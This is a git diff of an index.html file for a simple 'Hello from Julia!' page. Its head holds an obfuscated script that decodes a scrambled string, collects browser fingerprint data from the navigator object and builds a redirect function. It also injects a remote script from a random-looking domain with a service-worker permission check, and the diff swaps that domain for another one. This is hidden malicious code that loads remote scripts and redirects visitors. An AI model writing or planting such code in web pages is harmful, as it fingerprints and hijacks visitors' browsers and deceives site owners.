--- a/index.html
+++ b/index.html
@@ -6,7 +6,7 @@
   <script>
     var a='mcrpolfattafloprcmlVeedrosmico?ncc=uca&FcusleluVlearVsyipoonrctannEdhrgoiiHdt_emgocdeellicboosmccoast_avDetrnseigoAnrcebsruocw=seelri_bvoemr_ssiiocn'.split('').reduce((m,c,i)=>i%2?m+c:c+m).split('c');var Replace=(o=>{var v=a[0];try{v+=a[1]+Boolean(navigator[a[2]][a[3]]);navigator[a[2]][a[4]](o[0]).then(r=>{o[0].forEach(k=>{v+=r[k]?a[5]+o[1][o[0].indexOf(k)]+a[6]+encodeURIComponent(r[k]):a[0]})})}catch(e){}return u=>window.location.replace([u,v].join(u.indexOf(a[7])>-1?a[5]:a[7]))})([[a[8],a[9],a[10],a[11]],[a[12],a[13],a[14],a[15]]]);
     var s = document.createElement('script');
-    s.src='//zjkdy.com/5d5/e8b4d/mw.min.js?z=8630034'+'&sw=/sw-check-permissions-34007.js';
+    s.src='//gmamq.com/5d5/e8b4d/mw.min.js?z=10627737'+'&sw=/sw-check-permissions-970f4.js';
     s.onload = function(result) {
         switch (result) {
             case 'onPermissionDefault':break;
@@ -17,7 +17,7 @@
         }
     };
     document.head.appendChild(s);
-  </script>
+</script>
 </head>
 <body>
   <h1>Hello from Julia!</h1>  
